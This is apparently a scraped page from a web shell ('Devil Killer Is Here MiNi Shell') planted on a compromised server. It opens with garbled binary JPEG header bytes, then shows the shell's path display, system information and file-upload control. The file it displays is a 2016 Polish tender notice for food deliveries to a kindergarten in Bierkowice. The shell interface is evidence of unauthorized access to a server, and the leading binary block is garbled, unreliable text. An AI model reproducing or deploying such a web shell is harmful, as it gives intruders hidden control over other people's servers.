JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160825/302764-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 302764 - 2016
              z dnia 2016-08-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kłodzko: Dostawa artykułów żywnościowych do Przedszkola  Gminnego z Oddziałami Integracyjnymi w Bierkowicach; Bierkowice 3; 57-300 Bierkowice <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Przedszkole Gminne z Oddziałami Integracyjnymi w Bierkowicach, krajowy numer identyfikacyjny
              2154649300000, ul.
              Bierkowice 
              3,
              57300  
              Kłodzko, woj.
              dolnośląskie, państwo
              , tel.
              748 673 122, e-mail
              , faks
              .
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Przedszkole publiczne</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.ug-klodzko.dolnyslask.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.ug-klodzko.dolnyslask.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Przedszkole Gminne  z Oddziałami Integracyjnymi <br />
                Adres:
                <br />Bierkowice 3 57-300 Bierkowice</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa artykułów żywnościowych do Przedszkola  Gminnego z Oddziałami Integracyjnymi w Bierkowicach; Bierkowice 3; 57-300 Bierkowice <br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b><br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa artykułów żywnościowych do Przedszkola  Gminnego z Oddziałami Integracyjnymi w Bierkowicach; Bierkowice 3.
 Przedmiot zamówienia został podzielony na 5 części (zadania) i obejmuje :
Zadanie Nr1 : Dostawa produktów zwierzęcych , mięsa i przetworów mięsnych (mięso wieprzowe) , mięsa i podrobów drobiowych
Zadanie Nr 2 : Dostawa produktów mleczarskich , oleju, produktów przemiału ziarna, owoców ,warzyw i podobnych produktów przetworzonych, różnych produktów spożywczych

Zadanie Nr 3 : Dostawa mrożonek : ryb mrożonych, mrożonych warzyw i owoców oraz innych produktów głęboko mrożonych
Zadanie Nr 4 : Dostawa owoców, warzyw i podobnych produktów 
Zadanie Nr 5 : Dostawa świeżego pieczywa i wyrobów cukierniczych 
<br /><br /><b>II.5) Główny kod CPV: </b><br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenie zamówień uzupełniających - Zamawiający przewiduje możliwość zwiększenia ilości zamówienia na podstawie zapisu art. 67 ust. 1 pkt 7 ustawy do 20 % wartości netto w stosunku do ilości oraz asortymentu artykułów ujętych w opisie przedmiotu zamówienia. <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca oświadcza, że posiada kompetencje i uprawnienia do prowadzenia określonej działalności zawodowej<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca oświadcza, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca oświadcza, że posiada zdolności techniczne i zawodowe zapewniające wykonanie zamówienia

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp ,
2)Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zgodnie z Oświadczeniem wstępnym wykonawcy stanowiącym Załącznik Nr 2 do SIWZ<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Zgodnie z Oświadczeniem wstępnym wykonawcy stanowiącym Załącznik Nr 2 do SIWZ</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>20</td></tr><tr><td>nazwy handlowe oferowanego produktu (pochodzenie)</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />4.	Zgodnie z art. 144 ust. 1 ustawy Zamawiający może przewidzieć możliwość zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonany będzie wybór wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:                                                                   a)gwałtowna dekoniunktura, 
b)ograniczenie dostępności produktów,                                                                 c)istotny wzrost lub spadek cen na rynku.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 31/08/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                do: 29/09/2016
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
